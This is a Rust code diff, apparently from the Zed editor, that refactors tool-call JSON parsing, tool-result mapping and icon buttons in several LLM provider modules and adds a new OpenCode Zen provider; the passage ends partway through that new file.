-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("copilot_chat");
const PROVIDER_NAME: LanguageModelProviderName =
@@ -579,7 +579,7 @@ pub fn map_to_language_model_completion_events(
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -1111,38 +1111,26 @@ fn into_copilot_responses(
Role::User => {
for content in &message.content {
if let MessageContent::ToolResult(tool_result) = content {
- let output = if let Some(out) = &tool_result.output {
- match out {
- serde_json::Value::String(s) => {
- responses::ResponseFunctionOutput::Text(s.clone())
- }
- serde_json::Value::Null => {
- responses::ResponseFunctionOutput::Text(String::new())
- }
- other => responses::ResponseFunctionOutput::Text(other.to_string()),
+ let output = match &tool_result.content {
+ LanguageModelToolResultContent::Text(text) => {
+ responses::ResponseFunctionOutput::Text(text.to_string())
}
- } else {
- match &tool_result.content {
- LanguageModelToolResultContent::Text(text) => {
- responses::ResponseFunctionOutput::Text(text.to_string())
- }
- LanguageModelToolResultContent::Image(image) => {
- if model.supports_vision() {
- responses::ResponseFunctionOutput::Content(vec![
- responses::ResponseInputContent::InputImage {
- image_url: Some(image.to_base64_url()),
- detail: Default::default(),
- },
- ])
- } else {
- debug_panic!(
- "This should be caught at {} level",
- tool_result.tool_name
- );
- responses::ResponseFunctionOutput::Text(
+ LanguageModelToolResultContent::Image(image) => {
+ if model.supports_vision() {
+ responses::ResponseFunctionOutput::Content(vec![
+ responses::ResponseInputContent::InputImage {
+ image_url: Some(image.to_base64_url()),
+ detail: Default::default(),
+ },
+ ])
+ } else {
+ debug_panic!(
+ "This should be caught at {} level",
+ tool_result.tool_name
+ );
+ responses::ResponseFunctionOutput::Text(
"[Tool responded with an image, but this model does not support vision]".into(),
)
- }
}
}
};
@@ -22,7 +22,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("deepseek");
const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("DeepSeek");
@@ -331,15 +331,25 @@ pub fn into_deepseek(
for message in request.messages {
for content in message.content {
match content {
- MessageContent::Text(text) => messages.push(match message.role {
- Role::User => deepseek::RequestMessage::User { content: text },
- Role::Assistant => deepseek::RequestMessage::Assistant {
- content: Some(text),
- tool_calls: Vec::new(),
- reasoning_content: current_reasoning.take(),
- },
- Role::System => deepseek::RequestMessage::System { content: text },
- }),
+ MessageContent::Text(text) => {
+ let should_add = if message.role == Role::User {
+ !text.trim().is_empty()
+ } else {
+ !text.is_empty()
+ };
+
+ if should_add {
+ messages.push(match message.role {
+ Role::User => deepseek::RequestMessage::User { content: text },
+ Role::Assistant => deepseek::RequestMessage::Assistant {
+ content: Some(text),
+ tool_calls: Vec::new(),
+ reasoning_content: current_reasoning.take(),
+ },
+ Role::System => deepseek::RequestMessage::System { content: text },
+ });
+ }
+ }
MessageContent::Thinking { text, .. } => {
// Accumulate reasoning content for next assistant message
current_reasoning.get_or_insert_default().push_str(&text);
@@ -445,7 +455,9 @@ impl DeepSeekEventMapper {
};
let mut events = Vec::new();
- if let Some(content) = choice.delta.content.clone() {
+ if let Some(content) = choice.delta.content.clone()
+ && !content.is_empty()
+ {
events.push(Ok(LanguageModelCompletionEvent::Text(content)));
}
@@ -476,7 +488,7 @@ impl DeepSeekEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -820,9 +820,7 @@ impl ConfigurationView {
.child(
Button::new("reset-api-url", "Reset API URL")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.on_click(
cx.listener(|this, _, _window, cx| this.reset_api_url(_window, cx)),
@@ -918,9 +916,11 @@ impl Render for ConfigurationView {
this.child(
Button::new("lmstudio-site", "LM Studio")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url(LMSTUDIO_SITE)
})
@@ -933,9 +933,11 @@ impl Render for ConfigurationView {
"Download LM Studio",
)
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url(LMSTUDIO_DOWNLOAD_URL)
})
@@ -946,9 +948,11 @@ impl Render for ConfigurationView {
.child(
Button::new("view-models", "Model Catalog")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url(LMSTUDIO_CATALOG_URL)
}),
@@ -981,9 +985,9 @@ impl Render for ConfigurationView {
} else {
this.child(
Button::new("retry_lmstudio_models", "Connect")
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon(IconName::PlayFilled)
+ .start_icon(
+ Icon::new(IconName::PlayFilled).size(IconSize::XSmall),
+ )
.on_click(cx.listener(move |this, _, _window, cx| {
this.retry_connection(_window, cx)
})),
@@ -22,7 +22,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("mistral");
const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("Mistral");
@@ -647,7 +647,7 @@ impl MistralEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -400,7 +400,14 @@ impl OllamaLanguageModel {
stream: true,
options: Some(ChatOptions {
num_ctx: Some(self.model.max_tokens),
- stop: Some(request.stop),
+ // Only send stop tokens if explicitly provided. When empty/None,
+ // Ollama will use the model's default stop tokens from its Modelfile.
+ // Sending an empty array would override and disable the defaults.
+ stop: if request.stop.is_empty() {
+ None
+ } else {
+ Some(request.stop)
+ },
temperature: request.temperature.or(Some(1.0)),
..Default::default()
}),
@@ -858,9 +865,7 @@ impl ConfigurationView {
.child(
Button::new("reset-context-window", "Reset")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.on_click(
cx.listener(|this, _, window, cx| {
@@ -905,9 +910,7 @@ impl ConfigurationView {
.child(
Button::new("reset-api-url", "Reset API URL")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.on_click(
cx.listener(|this, _, window, cx| this.reset_api_url(window, cx)),
@@ -949,9 +952,11 @@ impl Render for ConfigurationView {
this.child(
Button::new("ollama-site", "Ollama")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| cx.open_url(OLLAMA_SITE))
.into_any_element(),
)
@@ -959,9 +964,11 @@ impl Render for ConfigurationView {
this.child(
Button::new("download_ollama_button", "Download Ollama")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
cx.open_url(OLLAMA_DOWNLOAD_URL)
})
@@ -972,9 +979,11 @@ impl Render for ConfigurationView {
.child(
Button::new("view-models", "View All Models")
.style(ButtonStyle::Subtle)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| cx.open_url(OLLAMA_LIBRARY_URL)),
),
)
@@ -1005,9 +1014,9 @@ impl Render for ConfigurationView {
} else {
this.child(
Button::new("retry_ollama_models", "Connect")
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::XSmall)
- .icon(IconName::PlayOutlined)
+ .start_icon(
+ Icon::new(IconName::PlayOutlined).size(IconSize::XSmall),
+ )
.on_click(cx.listener(move |this, _, window, cx| {
this.retry_connection(window, cx)
})),
@@ -9,14 +9,13 @@ use language_model::{
LanguageModelCompletionEvent, LanguageModelId, LanguageModelImage, LanguageModelName,
LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName,
LanguageModelProviderState, LanguageModelRequest, LanguageModelRequestMessage,
- LanguageModelToolChoice, LanguageModelToolResult, LanguageModelToolResultContent,
- LanguageModelToolUse, LanguageModelToolUseId, MessageContent, RateLimiter, Role, StopReason,
- TokenUsage, env_var,
+ LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolUse,
+ LanguageModelToolUseId, MessageContent, RateLimiter, Role, StopReason, TokenUsage, env_var,
};
use menu;
use open_ai::responses::{
- ResponseFunctionCallItem, ResponseFunctionCallOutputItem, ResponseInputContent,
- ResponseInputItem, ResponseMessageItem,
+ ResponseFunctionCallItem, ResponseFunctionCallOutputContent, ResponseFunctionCallOutputItem,
+ ResponseInputContent, ResponseInputItem, ResponseMessageItem,
};
use open_ai::{
ImageUrl, Model, OPEN_AI_API_URL, ReasoningEffort, ResponseStreamEvent,
@@ -34,7 +33,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = language_model::OPEN_AI_PROVIDER_ID;
const PROVIDER_NAME: LanguageModelProviderName = language_model::OPEN_AI_PROVIDER_NAME;
@@ -506,12 +505,16 @@ pub fn into_open_ai(
model: model_id.into(),
messages,
stream,
+ stream_options: if stream {
+ Some(open_ai::StreamOptions::default())
+ } else {
+ None
+ },
stop: request.stop,
temperature: request.temperature.or(Some(1.0)),
max_completion_tokens: max_output_tokens,
parallel_tool_calls: if supports_parallel_tool_calls && !request.tools.is_empty() {
- // Disable parallel tool calls, as the Agent currently expects a maximum of one per turn.
- Some(false)
+ Some(supports_parallel_tool_calls)
} else {
None
},
@@ -642,7 +645,18 @@ fn append_message_to_response_items(
input_items.push(ResponseInputItem::FunctionCallOutput(
ResponseFunctionCallOutputItem {
call_id: tool_result.tool_use_id.to_string(),
- output: tool_result_output(&tool_result),
+ output: match tool_result.content {
+ LanguageModelToolResultContent::Text(text) => {
+ ResponseFunctionCallOutputContent::Text(text.to_string())
+ }
+ LanguageModelToolResultContent::Image(image) => {
+ ResponseFunctionCallOutputContent::List(vec![
+ ResponseInputContent::Image {
+ image_url: image.to_base64_url(),
+ },
+ ])
+ }
+ },
},
));
}
@@ -710,21 +724,6 @@ fn flush_response_parts(
parts.clear();
}
-fn tool_result_output(result: &LanguageModelToolResult) -> String {
- if let Some(output) = &result.output {
- match output {
- serde_json::Value::String(text) => text.clone(),
- serde_json::Value::Null => String::new(),
- _ => output.to_string(),
- }
- } else {
- match &result.content {
- LanguageModelToolResultContent::Text(text) => text.to_string(),
- LanguageModelToolResultContent::Image(image) => image.to_base64_url(),
- }
- }
-}
-
fn add_message_content_part(
new_part: open_ai::MessagePart,
role: Role,
@@ -836,7 +835,7 @@ impl OpenAiEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -991,7 +990,7 @@ impl OpenAiResponseEventMapper {
if let Some(entry) = self.function_calls_by_item.get_mut(&item_id) {
entry.arguments.push_str(&delta);
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
return vec![Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -1415,9 +1414,11 @@ impl Render for ConfigurationView {
)
.child(
Button::new("docs", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _window, cx| {
cx.open_url("https://zed.dev/docs/ai/llm-providers#openai-api-compatible")
}),
@@ -1439,7 +1440,9 @@ impl Render for ConfigurationView {
mod tests {
use futures::{StreamExt, executor::block_on};
use gpui::TestAppContext;
- use language_model::{LanguageModelRequestMessage, LanguageModelRequestTool};
+ use language_model::{
+ LanguageModelRequestMessage, LanguageModelRequestTool, LanguageModelToolResult,
+ };
use open_ai::responses::{
ReasoningSummaryPart, ResponseFunctionToolCall, ResponseOutputItem, ResponseOutputMessage,
ResponseReasoningItem, ResponseStatusDetails, ResponseSummary, ResponseUsage,
@@ -1685,7 +1688,7 @@ mod tests {
{
"type": "function_call_output",
"call_id": "call-42",
- "output": "{\"forecast\":\"Sunny\"}"
+ "output": "Sunny"
}
],
"stream": true,
@@ -545,9 +545,7 @@ impl Render for ConfigurationView {
.child(
Button::new("reset-api-key", "Reset API Key")
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::Small))
.layer(ElevationIndex::ModalSurface)
.when(env_var_set, |this| {
this.tooltip(Tooltip::text(format!("To reset your API key, unset the {env_var_name} environment variable.")))
@@ -21,7 +21,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openrouter");
const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenRouter");
@@ -657,7 +657,7 @@ impl OpenRouterEventMapper {
if !entry.id.is_empty() && !entry.name.is_empty() {
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&entry.arguments),
+ &fix_streamed_json(&entry.arguments),
) {
events.push(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -0,0 +1,646 @@
+use anyhow::Result;
+use collections::BTreeMap;
+use futures::{FutureExt, StreamExt, future::BoxFuture};
+use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window};
+use http_client::HttpClient;
+use language_model::{
+ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError,
+ LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider,
+ LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState,
+ LanguageModelRequest, LanguageModelToolChoice, RateLimiter, Role, env_var,
+};
+use opencode::{ApiProtocol, OPENCODE_API_URL};
+pub use settings::OpenCodeAvailableModel as AvailableModel;
+use settings::{Settings, SettingsStore};
+use std::sync::{Arc, LazyLock};
+use strum::IntoEnumIterator;
+use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
+use ui_input::InputField;
+use util::ResultExt;
+
+use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic};
+use crate::provider::google::{GoogleEventMapper, into_google};
+use crate::provider::open_ai::{
+ OpenAiEventMapper, OpenAiResponseEventMapper, into_open_ai, into_open_ai_response,
+};
+
+const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode");
+const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode Zen");
+
+const API_KEY_ENV_VAR_NAME: &str = "OPENCODE_API_KEY";
+static API_KEY_ENV_VAR: LazyLock<EnvVar> = env_var!(API_KEY_ENV_VAR_NAME);
+
+#[derive(Default, Clone, Debug, PartialEq)]
+pub struct OpenCodeSettings {
+ pub api_url: String,
+ pub available_models: Vec<AvailableModel>,
+}
+
+pub struct OpenCodeLanguageModelProvider {
+ http_client: Arc<dyn HttpClient>,
+ state: Entity<State>,
+}
+
+pub struct State {
+ api_key_state: ApiKeyState,
+}
+
+impl State {
+ fn is_authenticated(&self) -> bool {
+ self.api_key_state.has_key()
+ }
+
+ fn set_api_key(&mut self, api_key: Option<String>, cx: &mut Context<Self>) -> Task<Result<()>> {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ self.api_key_state
+ .store(api_url, api_key, |this| &mut this.api_key_state, cx)
+ }
+
+ fn authenticate(&mut self, cx: &mut Context<Self>) -> Task<Result<(), AuthenticateError>> {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ self.api_key_state
+ .load_if_needed(api_url, |this| &mut this.api_key_state, cx)
+ }
+}
+
+impl OpenCodeLanguageModelProvider {
+ pub fn new(http_client: Arc<dyn HttpClient>, cx: &mut App) -> Self {
+ let state = cx.new(|cx| {
+ cx.observe_global::<SettingsStore>(|this: &mut State, cx| {
+ let api_url = Self::api_url(cx);
+ this.api_key_state
+ .handle_url_change(api_url, |this| &mut this.api_key_state, cx);
+ cx.notify();
+ })
+ .detach();
+ State {
+ api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()),
+ }
+ });
+
+ Self { http_client, state }
+ }
+
+ fn create_language_model(&self, model: opencode::Model) -> Arc<dyn LanguageModel> {
+ Arc::new(OpenCodeLanguageModel {
+ id: LanguageModelId::from(model.id().to_string()),
+ model,
+ state: self.state.clone(),
+ http_client: self.http_client.clone(),
+ request_limiter: RateLimiter::new(4),
+ })
+ }
+
+ pub fn settings(cx: &App) -> &OpenCodeSettings {
+ &crate::AllLanguageModelSettings::get_global(cx).opencode
+ }
+
+ fn api_url(cx: &App) -> SharedString {
+ let api_url = &Self::settings(cx).api_url;
+ if api_url.is_empty() {
+ OPENCODE_API_URL.into()
+ } else {
+ SharedString::new(api_url.as_str())
+ }
+ }
+}
+
+impl LanguageModelProviderState for OpenCodeLanguageModelProvider {
+ type ObservableEntity = State;
+
+ fn observable_entity(&self) -> Option<Entity<Self::ObservableEntity>> {
+ Some(self.state.clone())
+ }
+}
+
+impl LanguageModelProvider for OpenCodeLanguageModelProvider {
+ fn id(&self) -> LanguageModelProviderId {
+ PROVIDER_ID
+ }
+
+ fn name(&self) -> LanguageModelProviderName {
+ PROVIDER_NAME
+ }
+
+ fn icon(&self) -> IconOrSvg {
+ IconOrSvg::Icon(IconName::AiOpenCode)
+ }
+
+ fn default_model(&self, _cx: &App) -> Option<Arc<dyn LanguageModel>> {
+ Some(self.create_language_model(opencode::Model::default()))
+ }
+
+ fn default_fast_model(&self, _cx: &App) -> Option<Arc<dyn LanguageModel>> {
+ Some(self.create_language_model(opencode::Model::default_fast()))
+ }
+
+ fn provided_models(&self, cx: &App) -> Vec<Arc<dyn LanguageModel>> {
+ let mut models = BTreeMap::default();
+
+ for model in opencode::Model::iter() {
+ if !matches!(model, opencode::Model::Custom { .. }) {
+ models.insert(model.id().to_string(), model);
+ }
+ }
+
+ for model in &Self::settings(cx).available_models {
+ let protocol = match model.protocol.as_str() {
+ "anthropic" => ApiProtocol::Anthropic,
+ "openai_responses" => ApiProtocol::OpenAiResponses,
+ "openai_chat" => ApiProtocol::OpenAiChat,
+ "google" => ApiProtocol::Google,
+ _ => ApiProtocol::OpenAiChat, // default fallback
+ };
+ models.insert(
+ model.name.clone(),
+ opencode::Model::Custom {
+ name: model.name.clone(),
+ display_name: model.display_name.clone(),
+ max_tokens: model.max_tokens,
+ max_output_tokens: model.max_output_tokens,
+ protocol,
+ },
+ );
+ }
+
+ models
+ .into_values()
+ .map(|model| self.create_language_model(model))
+ .collect()
+ }
+
+ fn is_authenticated(&self, cx: &App) -> bool {
+ self.state.read(cx).is_authenticated()
+ }
+
+ fn authenticate(&self, cx: &mut App) -> Task<Result<(), AuthenticateError>> {
+ self.state.update(cx, |state, cx| state.authenticate(cx))
+ }
+
+ fn configuration_view(
+ &self,
+ _target_agent: language_model::ConfigurationViewTargetAgent,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> AnyView {
+ cx.new(|cx| ConfigurationView::new(self.state.clone(), window, cx))
+ .into()
+ }
+
+ fn reset_credentials(&self, cx: &mut App) -> Task<Result<()>> {
+ self.state
+ .update(cx, |state, cx| state.set_api_key(None, cx))
+ }
+}
+
+pub struct OpenCodeLanguageModel {
+ id: LanguageModelId,
+ model: opencode::Model,
+ state: Entity<State>,
+ http_client: Arc<dyn HttpClient>,
+ request_limiter: RateLimiter,
+}
+
+impl OpenCodeLanguageModel {
+ /// Returns the base API URL (e.g., "https://opencode.ai/zen").
+ fn base_api_url(&self, cx: &AsyncApp) -> SharedString {
+ self.state
+ .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx))
+ }
+
+ fn api_key(&self, cx: &AsyncApp) -> Option<Arc<str>> {
+ self.state.read_with(cx, |state, cx| {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ state.api_key_state.key(&api_url)
+ })
+ }
+
+ fn stream_anthropic(
+ &self,
+ request: anthropic::Request,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<
+ futures::stream::BoxStream<
+ 'static,
+ Result<anthropic::Event, anthropic::AnthropicError>,
+ >,
+ LanguageModelCompletionError,
+ >,
+ > {
+ let http_client = self.http_client.clone();
+ // Anthropic crate appends /v1/messages to api_url
+ let api_url = self.base_api_url(cx);
+ let api_key = self.api_key(cx);
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = anthropic::stream_completion(
+ http_client.as_ref(),
+ &api_url,
+ &api_key,
+ request,
+ None,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+
+ fn stream_openai_chat(
+ &self,
+ request: open_ai::Request,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<futures::stream::BoxStream<'static, Result<open_ai::ResponseStreamEvent>>>,
+ > {
+ let http_client = self.http_client.clone();
+ // OpenAI crate appends /chat/completions to api_url, so we pass base + "/v1"
+ let base_url = self.base_api_url(cx);
+ let api_url: SharedString = format!("{base_url}/v1").into();
+ let api_key = self.api_key(cx);
+ let provider_name = PROVIDER_NAME.0.to_string();
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = open_ai::stream_completion(
+ http_client.as_ref(),
+ &provider_name,
+ &api_url,
+ &api_key,
+ request,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+
+ fn stream_openai_response(
+ &self,
+ request: open_ai::responses::Request,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<futures::stream::BoxStream<'static, Result<open_ai::responses::StreamEvent>>>,
+ > {
+ let http_client = self.http_client.clone();
+ // Responses crate appends /responses to api_url, so we pass base + "/v1"
+ let base_url = self.base_api_url(cx);
+ let api_url: SharedString = format!("{base_url}/v1").into();
+ let api_key = self.api_key(cx);
+ let provider_name = PROVIDER_NAME.0.to_string();
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = open_ai::responses::stream_response(
+ http_client.as_ref(),
+ &provider_name,
+ &api_url,
+ &api_key,
+ request,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+
+ fn stream_google_zen(
+ &self,
+ request: google_ai::GenerateContentRequest,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<futures::stream::BoxStream<'static, Result<google_ai::GenerateContentResponse>>>,
+ > {
+ let http_client = self.http_client.clone();
+ let api_url = self.base_api_url(cx);
+ let api_key = self.api_key(cx);
+
+ let future = self.request_limiter.stream(async move {
+ let Some(api_key) = api_key else {
+ return Err(LanguageModelCompletionError::NoApiKey {
+ provider: PROVIDER_NAME,
+ });
+ };
+ let request = opencode::stream_generate_content_zen(
+ http_client.as_ref(),
+ &api_url,
+ &api_key,
+ request,
+ );
+ let response = request.await?;
+ Ok(response)
+ });
+
+ async move { Ok(future.await?.boxed()) }.boxed()
+ }
+}
+
+impl LanguageModel for OpenCodeLanguageModel {
+ fn id(&self) -> LanguageModelId {
+ self.id.clone()
+ }
+
+ fn name(&self) -> LanguageModelName {
+ LanguageModelName::from(self.model.display_name().to_string())
+ }
+
+ fn provider_id(&self) -> LanguageModelProviderId {
+ PROVIDER_ID
+ }
+
+ fn provider_name(&self) -> LanguageModelProviderName {
+ PROVIDER_NAME
+ }
+
+ fn supports_tools(&self) -> bool {
+ self.model.supports_tools()
+ }
+
+ fn supports_images(&self) -> bool {
+ self.model.supports_images()
+ }
+
+ fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool {
+ match choice {
+ LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true,
+ LanguageModelToolChoice::None => {
+ // Google models don't support None tool choice
+ self.model.protocol() != ApiProtocol::Google
+ }
+ }
+ }
+
+ fn telemetry_id(&self) -> String {
+ format!("opencode/{}", self.model.id())
+ }
+
+ fn max_token_count(&self) -> u64 {
+ self.model.max_token_count()
+ }
+
+ fn max_output_tokens(&self) -> Option<u64> {
+ self.model.max_output_tokens()
+ }
+
+ fn count_tokens(
+ &self,
+ request: LanguageModelRequest,
+ cx: &App,
+ ) -> BoxFuture<'static, Result<u64>> {
+ cx.background_spawn(async move {
+ let messages = request
+ .messages
+ .into_iter()
+ .map(|message| tiktoken_rs::ChatCompletionRequestMessage {
+ role: match message.role {
+ Role::User => "user".into(),
+ Role::Assistant => "assistant".into(),
+ Role::System => "system".into(),
+ },
+ content: Some(message.string_contents()),
+ name: None,
+ function_call: None,
+ })
+ .collect::<Vec<_>>();
+
+ tiktoken_rs::num_tokens_from_messages("gpt-4o", &messages).map(|tokens| tokens as u64)
+ })
+ .boxed()
+ }
+
+ fn stream_completion(
+ &self,
+ request: LanguageModelRequest,
+ cx: &AsyncApp,
+ ) -> BoxFuture<
+ 'static,
+ Result<
+ futures::stream::BoxStream<
+ 'static,
+ Result<LanguageModelCompletionEvent, LanguageModelCompletionError>,
+ >,
+ LanguageModelCompletionError,
+ >,
+ > {
+ match self.model.protocol() {
+ ApiProtocol::Anthropic => {
+ let anthropic_request = into_anthropic(
+ request,
+ self.model.id().to_string(),
+ 1.0,
+ self.model.max_output_tokens().unwrap_or(8192),
+ anthropic::AnthropicModelMode::Default,
+ );
+ let stream = self.stream_anthropic(anthropic_request, cx);
+ async move {
+ let mapper = AnthropicEventMapper::new();
+ Ok(mapper.map_stream(stream.await?).boxed())
+ }
+ .boxed()
+ }
+ ApiProtocol::OpenAiChat => {
+ let openai_request = into_open_ai(
+ request,
+ self.model.id(),
+ false,
+ false,
+ self.model.max_output_tokens(),
+ None,
+ );
+ let stream = self.stream_openai_chat(openai_request, cx);
+ async move {
+ let mapper = OpenAiEventMapper::new();
+ Ok(mapper.map_stream(stream.await?).boxed())
+ }
+ .boxed()
+ }
+ ApiProtocol::OpenAiResponses => {
+ let response_request = into_open_ai_response(
+ request,
+ self.model.id(),
+ false,
+ false,
+ self.model.max_output_tokens(),
+ None,
+ );
+ let stream = self.stream_openai_response(response_request, cx);
+ async move {
+ let mapper = OpenAiResponseEventMapper::new();
+ Ok(mapper.map_stream(stream.await?).boxed())
+ }
+ .boxed()
+ }
+ ApiProtocol::Google => {
+ let google_request = into_google(
+ request,
+ self.model.id().to_string(),
+ google_ai::GoogleModelMode::Default,
+ );
